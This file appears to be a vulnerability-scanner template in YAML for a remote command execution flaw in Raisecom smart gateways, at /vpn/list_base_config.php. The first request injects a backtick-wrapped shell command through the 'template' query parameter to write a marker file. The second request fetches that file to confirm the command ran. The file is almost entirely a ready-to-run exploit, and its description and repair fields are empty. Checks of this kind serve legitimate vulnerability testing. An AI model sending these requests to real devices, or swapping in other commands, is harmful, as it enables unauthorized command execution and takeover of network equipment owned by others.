id:

info:
  name: 瑞斯康达智能网关list_base_config.php远程命令执行
  severity:
  description:
  details:
  repair:
requests1:
  method: GET
  path: /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27123456%27%3E%2Fwww%2Ftmp%2Ftest2.txt%60
  headers:
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Connection: close
response1:
requests2:
  method: GET
  path: /tmp/test2.txt
  headers:
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Connection: close
response2:
  body: 123
  code: 200